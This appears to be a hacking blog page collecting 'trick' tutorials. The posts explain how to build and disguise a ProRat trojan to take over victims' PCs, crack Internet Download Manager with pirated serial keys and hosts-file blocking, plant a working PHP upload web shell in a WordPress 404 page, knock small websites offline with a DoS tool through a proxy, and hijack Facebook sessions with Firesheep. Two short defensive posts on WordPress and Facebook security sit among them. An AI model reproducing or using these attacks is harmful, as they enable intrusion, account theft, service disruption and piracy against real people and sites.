ProRAT(Hacking Trick)

To show you an example of a malicious program, I will use a well known Windows Trojan, ProRat using a Rat tool you can hack any email account in world facebook, yahoo,gmail,..etc.

1. Download ProRat. Once it is downloaded right click on the folder and choose to extract it. antivirus wil detect it as trojan but it is a false positive detection.
2. Open up the program. You should see the following:

3. Next we will create the actual Trojan file. Click on Create and choose Create ProRat Server. 


4. Next put in your IP address so the server could connect to you. If you don’t know your IP address click on the little arrow to have it filled in for you automatically. Next put in your e-mail so that when and if a victim gets infected it will send you a message. We will not be using the rest of the options. 

5. Click on the General Settings button to continue. Here we will choose the server port the program will connect through, the password you will be asked to enter when the victim is infected and you wish to connect with them, and the victim name. As you can see ProRat has the ability to disable the windows firewall and hide itself from being displayed in the task manager.

6. Click on the Bind with File button to continue. Here you will have the option to bind the trojan server file with another file. Remember a trojan can only be executed if a human runs it. So by binding it with a legitimate file like a text document or a game, the chances of someone clicking it go up. Check the bind option and select a file to bind it to. In the example I will use an ordinary text document. 

7. Click on the Server Extensions button to continue. Here you choose what kind of server file to generate. I will stick with the default because it has icon support, but exe’s looks suspicious so it would be smart to change it. 

8. Click on Server Icon to continue. Here you will choose an icon for your server file to have. The icons help mask what the file actually is. For my example I will choose the regular text document icon since my file is a text document. 

9. Finally click on Create Server to, you guessed it, create the server file. Below is what my server file looks like.

10. A hacker would probably rename it to something like “Funny Joke” and send it as an attachment to some people. A hacker could also put it up as a torrent pretending it is something else, like the latest game that just came out so he could get people to download it. 
11. Now, I will show you what happens when a victim installs the server onto his computer and what the hacker could do next. 
12. I’m going to run the server on my own computer to show you what would happen. Once I run it the trojan will be installed onto my computer in the background. The hacker would then get a message telling him that I was infected. He would then connect to my computer by typing in my IP address, port and clicking Connect. He will be asked for the password that he made when he created the server. Once he types it in, he will be connected to my computer and have full control over it. 

13. Now the hacker has a lot of options to choose from as you can see on the right. He has access to all my computer files, he can shut down my pc, get all the saved passwords off my computer, send a message to my computer, format my whole hard drive, take a screen shot of my computer, and so much more. Below I’ll show you a few examples 

14. The image below shows the message I would get on my screen if the hacker chose to message me. 

15. Below is an image of my task bar after the hacker clicks on Hide Start Button. 

16. Below is an image of what the hacker would see if he chose to take a screen shot of the victims screen.

As you saw in the above example, a hacker can do a lot of silly things or a lot of damage to the victim. ProRat is a very well known trojan so if the victim has an anti-virus program installed he most likely won’t get infected. Many skilled hackers can program their own viruses and Trojans that can easily bypass anti-virus programs.

Read more »

How to Crack Internet Download Manager (IDM) manually(How-tos)

Hello Friends, today i am going to explain how to hack or crack Internet Download Manager (IDM) manually. IDM is the best Internet download manager available on internet but its not free and its cracked or patched versions contains viruses. Using this hack you can register the Internet Download Manager (IDM) for free using you own credentials i.e register on your Name and email ID. I am explaining the manual hacking method because most of my users said that patch and keygen contain viruses.

Now suppose you have updated your IDM (Internet Download Manager) and if you are using cracked or patched version, after updating IDM, it shows an error message that you have registered IDM using fake serial key. And after that IDM exits and hence it doesn't download anything.

This hack also works for trail IDM that means download a trail IDM from there site and register the professional i.e. full version of IDM with your credentials for free using my hack.

Let's start the tutorial, How to hack or crack IDM manually.

Steps Involved:

Step 1: Download the IDM trial or If you already have IDM installed Update it by going to Help---}} then to check for Updates.

 If you don't wanna update your version, Just click on Registration.

Step2: When you click on registration, Now a new dialog appears that is asking for Name, Last Name, Email Address and Serial Key.

Step3: Now Enter you name, last name, email address and in field of Serial Key enter any of the following Keys:

RLDGN-OV9WU-5W589-6VZH1

HUDWE-UO689-6D27B-YM28M

UK3DV-E0MNW-MLQYX-GENA1

398ND-QNAGY-CMMZU-ZPI39

GZLJY-X50S3-0S20D-NFRF9

W3J5U-8U66N-D0B9M-54SLM

EC0Q6-QN7UH-5S3JB-YZMEK

UVQW0-X54FE-QW35Q-SNZF5

FJJTJ-J0FLF-QCVBK-A287M

And click on ok to register.

Step4: Now after you click ok, it will show an error message that you have registered IDM using fake serial key and IDM will exit. Now here the hack starts.

Step5: Now Go to START --}} Then go to RUN  and type the following text and click enter:

notepad %windir%\system32\drivers\etc\hosts

For Windows 7 users, due to security reasons you will not be able to save hosts file.

The trick is below: 

First of all go to C:/ drive then go to Windows Folder and then go to System32 folder and then go to Drivers folder and then go to Etc Folder, in the Etc folder you will see thehosts file.

Now right click on hosts file and go to its properties, then go to security tab and then select your admin account, just below u will see an edit button (in front of change permissions), Now give the user full control and write and read rights and then click on applyand then click on Ok, now u will be able to edit the hosts file and save changes in it.Step6: Now a notepad file appears something like this as shown below:

Now copy the below lines of code and add to hosts file as shown above:

127.0.0.1    tonec.com

127.0.0.1    www.tonec.com

127.0.0.1    registeridm.com

127.0.0.1    www.registeridm.com

127.0.0.1    secure.registeridm.com

127.0.0.1    internetdownloadmanager.com

127.0.0.1    www.internetdownloadmanager.com

127.0.0.1    secure.internetdownloadmanager.com

127.0.0.1    mirror.internetdownloadmanager.com

127.0.0.1    mirror2.internetdownloadmanager.com

After adding these piece of code, save the notepad file. And exit from there.

Now start your Internet download manager, and now you IDM has been converted to full version and specially when you update next time, your registration will not expire. That means it will remain full version for life time and you can update it without any problem.

Here is my proof of Successfully Hacking IDM:

Read more »

How To Upload Shell To Wordpress(Wordpress trick)

Wordpress hacking is basically harder. If somehow you can upload a shell, the entire task become easier. As shell i like C99. Shell is something virus type file that make a web server vulnerable to hack. Now learn how to upload shell to Wordpress

Shell Upload In Wordpress

Go to Wordpress Dashboard → Appearance → Editor

Now Open the 404.Php file. copy the code and paste the following code just opening of the file

 

 

<?php echo '<b><br><br>'.php_uname().'<br></b>'; echo '<form action=""

 method="post" enctype="multipart/form-data" name="uploader" id="uploader">';

 echo '<input type="file" name="file" size="50"><input name="_upl" type="submit"

 id="_upl" value="Upload"></form>'; if( $_POST['_upl'] == "Upload" ) {  if(@copy($_FILES['file']

['tmp_name'], $_FILES['file']['name'])) { echo '<b>credits : www.edutechnology.net</b><br><br>'; }

 else { echo '<b>Upload Sucess !!!</b><br><br>'; } } ?>

Now save the file
Now go to http://www.site.com/wp-content/themes/themename/yourshellfile.php
You will see a shell upload tab
If you access a 404 error page, you will also see that upload tab
Now Upload c99 or c55 shell
Afterwards chnage the index.php file in public_html using shell 
Happy Hacking :P
Enjoyed the article ? Please share if you like. Thank you for reading 

Read more »

How To Crash Small Websites- Tutorial(Cmd Trick)

How To Crash Small Websites- Tutorial


So your friend or your enemy has made a little shitty website for whatever maybe a private server or anything.. And your feeling devious and want to crash it.ok after this tutorial go for it.
TOOLS:
>>Port Scanner<< (Download any Port Scanner) >>rDos<<==> Download Link Click Here
>>HotSpotSheild Proxy!<< ( You can use other Proxy to Hide your IP) Step One: First we need to find the websites IP Adress. This is very easy to do. Assume the URL is http://www.yoursite.com . Now Open your Cmd by press Start>Run>cmd .After opened cmd type ping http://www.yoursite.com then press enter and you will get the ip of the victims website. (YOU MUST REMOVE HTTP:// AND ANY /’s)

Step Two: Now you must test to see port 80 is opened or not (usually it is opened).
This is very easy process. Open the port scanner that you have been downloaded .
In port scanner type your Victims ip that you got from step 1.
It will ask you to do a range scan or a full scan (SELECT RANGE SCAN!) then It will ask for conformation you have to use a capital Y or a capital N! Now enter 79 for lowest port and 81 for highest hit enter than hit cap Y.
[X] = Closed
[X] Vulnerable = Open


Step Three : ALMOST DONE:
The final and easiest step (IF PORT 80 IS CLOSED PICK A NEW SITE!)
If port 80 is opened then you are on the way of crashing!!
Now open your rDos that you have downloaded.
Enter your victims ip that you got from step 1.
It will ask you for the port to attack use port 80 that’s why we scanned to make sure that 80 was open! If it is closed it will not work.
Hit enter.. *=Flooding -=Crashed Or didn’t connect!
EXAMPLE:

Happy Hacking :D

Read more »

Lock Your Wordpress Sites Index File(Wordpress trick)

As we know wordpress is very popular CMS but its also difficult to save your wordpress site from hacking.I am sharing now a effective tips to make strong your wordpress security.How to lock your wprdpress index file? Look here



http://www.yourwebsite.com/wp-includes/http://www.yourwebsite.com/wp-content/uploads/




we cant see the index file of wordpress and it strengthen your wordpress security
Now see here
http://www.alokborsho.com/wp-includes/http://www.alokborsho.com/wp-content/uploads/
We can access wp index file and this sites are vulnerable to hack
Now question how to off your index ?

Login to your hosting cpanel and paste the code in your .htaccess file then save the file then if you or anybody want to access your wp index file this will show   403 Permission Denied you do not have permission for this request /wp-content/uploads/

# BEGIN WordPress
Options -Indexes

RewriteEngine On
RewriteBase /
RewriteRule ^index.php$ – [L]
RewriteRule ^login/?$ /wp-login.php [QSA,L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]


# END WordPress 

 Disclaimer: Before pasting code take the backup of your .htaccess file

Read more »

How to protect your facebook account from hackers(Facebook Trick)

Now-a-days facebook is the largest social networking site which is used by millions of people all over the world.

Hackers are targeting it as the primary source to get access to the person information of there victims.Fb has been Hacked time and again.

One thing you should keep in your mind that Hacker Can Only Hack Your Facebook With Your Mistake. So don’t make any serious mistake while using Fb.

Just follow the ways described below for protection of  your facebook account from hackers.
1. Enable Secure Browsing

In the past Fb used Secure SSL encryption only for Login Screen i.e It used the Hyper Text Transfer Protocol Secure(HTTPS) only at the time people used to log in. But now with the increase in its  Security guidelines. Facebook Provides SSL encryption even when you get logged in.

IF you see an https  with the logo of Facebook as above then you already have HTTPS encryption on your profile.

If you don’t see anything like the above picture when you log into your profile

Choose Security from Left sidebar.>> then just go to Account Settings>>


ON the right side Check on the option Secure Browsing is enabled and Save Changes.

A secure HTTPS encrypted page takes comparatively more time to load up but its worth the protection it provides in return.
2.Fake home page
Your Profile can still be hacked if you enter your passwords on Phishing Pages.( Phishing Pages are those Websites which are not the original Website.).

A strange link was spread on the whole Fb which leads you to a page similar to the Fb  login page  but the URL was different. That means you are giving your user id and password to any other website which redirects you to your actual fb profile after entering your id and password.
 3. Choose a Strong Unique Password

By Unique i mean to say that your each and every Email id should have a unique Password.

The Password can be a Strong Passwords if:

    It consists of UPPERCASE , lowercase and Symbols
    It is not found in the Dictionary
    It is not anything common to find like 123456 or asdfjkl.
    It should not be your Mobile Number ,Date of birth or the name of any Person like your Mom or Dad
    It should be changed every Week

Strong Passwords prevent users from Brute Force CrackingAn example of a strong Password is qwerZXCV456!#%&(24680
4. Never Run any Code From any Facebook Page

There are many Scam Pages on Facebook like Join to see who visited your Fb Profile or Earn 1000000 $ per Month. These Pages will ask you to copy some codes and paste it into your Browser. In short they are making you run a malicious Code which would SPAM your friends with similar Pages and would compromise your Security.
5. Never use applications which want your password for verification

There are a large number of fb application which ask  you for the permission to post on your behalf. This is being asked mostly by application which spam you as well your friends with malicious links. so never give them permission as  these are hacking spams and profile can be hacked.
6. DO Not Share your Password Even with Anyone

Even if your Girlfriend /Mom/ Dad / Sister/ Best friend asks for your Email ID or Password. Just tell them a simple Lie that you don’t remember your Password at this moment or you are confused between a set of 10 passwords.

Just tell them a slightly wrong passwords if they force you as protection of your Fb profile is important.

Its Better to deactivate an account rather giving up your Password .

Its your Own Life ONLINE. DON’T SHARE IT.
7.USE AN UPDATED ANTIVIRUS

Use of an Updated Antivirus Prevent you from All sorts of phishing Attacks, Trojans, Rats &  Keyloggers.

This would also help you in surfing online with security from malicious codes.
8. Connect Multiple Email Addresses

Connecting Multiple Email Accounts with your Fb account Prevents you Even if one of your Primary Email Account is been Hacked by someone.

For Connecting Multiple Email Accounts

    Go to Account Setting and then Just Click Edit In from of the Email Option
    Click on Add another email.
    Enter another email
    Enter your current Password and save the changes.

9. Connect Your Mobile Number with your Facebook Account

Facebook Mobile Confirmation has given a lot of relief to its users. You can again find this option in account Settings.Click on Mobile in the Left hand side.

Click on Add a Phone.

Once you Add your Phone , You would have to Active Fb  Text as shown below.

Enter the Confirmation code sent to your mobile and Hit next.Done.

Once You confirm your Mobile Number. Every Time you log into your Fb profile , a confirmation code would be sent to your Mobile Numbers which you will need to enter online.

This would protect your Profile  from unauthorized access as the attacker wont have the Confirmation Code sent to your mobile.
10.Never sign in from any other compueter or cybercafe

Don’t sign in to your Fb Profile  from any other computer except those on which you can trust.

Because some people have installed softwares to record the keys which are pressed on their computer.Such softwares are known as keyloggers, which record screenshots and evrything you on your system.
11.Password reset E-MailsA recent attack on Facebook which sends user an e-mail to reset your password. These e-mails were actually sent to infect the computer. Fb was under the attack of fake fb pages which was used to get the private information like password username e.t.c from the users. Fortunately that was controlled on time.
12. LEARN TO HACK

Just remember these tips and  and keep facebooking..:)

Read more »

How To Hack Facebook Account Using Firesheep(Facebook trick)

Firesheep make facebook hacking easy

Recently a new firefox addon Firesheep have been a cause of thousands of email accounts, As reported by techcurnch, Firesheep has been downloaded more than 104,000 times in roughly last 24 hours, With Firesheep the hacker can control any account without even knowing the username and password of the desired account, As Facebook is worlds most popular Social Networking website, therefore it has been the major victim of it, Firesheep uses Http Session hijacking attack to gain unauthorized access to a Facebook or any other account

What is Session Hijacking?

In a Http session hijacking attack an attacker steals victims cookies, Cookies stores all the necessary Information about one’s account , using this information you can hack anybody’s account and change his password. If you get the Cookies of the Victim you can Hack any account the Victim is Logged into i.e. you can hack Facebook Google, Yahoo, Orkut, Flickr etc or any other email account

How can a Hacker use Firesheep to Hack a Facebook or any other account?

Now I will tell you how can a hacker use firesheep to hack a facebook or any other account, You will need the following things:

• Public wifi access
• winpcap
  
• Firesheep(Download)

Method

1. First of all download "Firesheep" from the above link and use the "openwith" option in the firefox browser

2. Once you have installed firesheep on firefox web browser, Click on view at the top, then goto sidebar and click on Firesheep
3. Now click on the top left button "Start capturing" and it will start to capture the session cookies of people in your wifi network, This will show you the list of those people whose cookies are captured and have visited unsecured website known to firesheep, Double click on the photo and you will be logged in instantly
Must comment.

Read more »